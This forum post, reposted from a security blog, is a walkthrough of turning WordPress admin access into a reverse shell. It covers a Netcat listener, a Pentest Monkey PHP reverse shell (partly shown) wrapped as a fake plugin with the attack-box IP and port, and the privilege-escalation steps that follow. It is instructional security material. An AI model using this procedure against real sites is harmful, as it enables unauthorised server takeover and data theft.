Active Members Fi8sVrs Posted June 12, 2018 Active Members Report Posted June 12, 2018 (edited) Shout out to Chaos Monkey and DustinFinn on Twitter Did you ever want to know how hackers get a reverse shell by compromising your WordPress install? Well wonder no more! After obtaining admin access to your WordPress (this means we either leveraged a vulnerability on your site with an existing vuln that you didn’t patch, guessed your password, or cracked the hash if we were able to obtain it, also by leveraging a vuln) we trick your WordPress into thinking we’re installing a plugin when in reality we’re uploading a shell script which connects us to your underlying file server. So the pre-req is to have admin access to the WordPress site in order for this vector to work. We cannot add plugins or themes as a guest or some other user. After that we go into the Plugins section of the dashboard and add a new one. On our attack box (this is the computer we are going to use to catch the shell into your fileserver) we open up a Netcat listener by going into Terminal and typing something like this: nc -lvp 1337 nc stands for Netcat -lvp Is listen, verbose and port 1337 is the port number on our attack box we are listening on We then create a text file which will contain our shell. For this example let’s use Pentest Monkey’s reverse shell On Kali Linux it is located here: /usr/share/webshells/php/php-reverse-shell.php We copy the contents of the reverse shell into the blank text file. At the top of the file, right under <?php We insert the lines needed for a WordPress Plugin called a header: It doesn’t matter what it says The header starts with /* and ends with */ <?php /* Plugin Name: BlackRoomSec's Evil Reverse Shell Plugin URI: https://www.blackroomsec.com Description: Gets Tara into your cybers, duh! Version: 1.0 baby Author: BRS Author URI: http://www.blackroomsec.com Text Domain: evil-shell Domain Path: /languages */ Then underneath that is the shell script (I snipped this) set_time_limit (0); $VERSION = "1.0"; $ip = '10.10.10.10'; // CHANGE THIS $port = 1337; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise / We change these two lines $ip = '10.10.10.10'; // CHANGE THIS $port = 1337; // CHANGE THIS to the IP address of our attack box we are using to catch the shell. If we’re practicing and doing the attack on a vulnerable machine on our own network or on the same subnet, nothing else is needed. However, in some cases if we are attacking a site on the Internet and want to reverse that into our box we have to either forward our ports to accepting incoming traffic OR We can use an attack box that is publicly accessible like a free-tiered Amazon EC2 instance or Google instance. In that case we would use the Public IP address of that system and start a Netcat listener on THAT system and then issue commands from there. The file then gets saved. We then compress the file in .ZIP format as that is the format needed for WordPress plugins and themes. We click install inside WordPress. It says it installs. And then once we hit “activate” our shell will be popped in our Terminal that was listening on port 1337. This gets us in as the www-data user typically. Or, in other words, GUEST. We now need to escalate our privileges by finding a way further into the box. This involves a number of enumeration techniques but typically we will first find a directory that www-data can access and write to. Usually the /tmp/ directory. How we test write capabilities is we issue the command touch test Where touch is the command to create a blank file and “test” is the name of the file. You can call it anything. Then we will copy our enumeration scripts into the files we create. Make them executable. (chmod +x filename) And run them and see what the results give us. Our goal is to get to the root user. Once we get root it’s an End Game scenario for you. We have complete control over your fileserver. Can create users, delete them, change passwords, anything we want. DM me on Twitter with questions. I have them open again for the time being. Source: blackroomsec.com Edited June 12, 2018 by OKQL 1 Quote
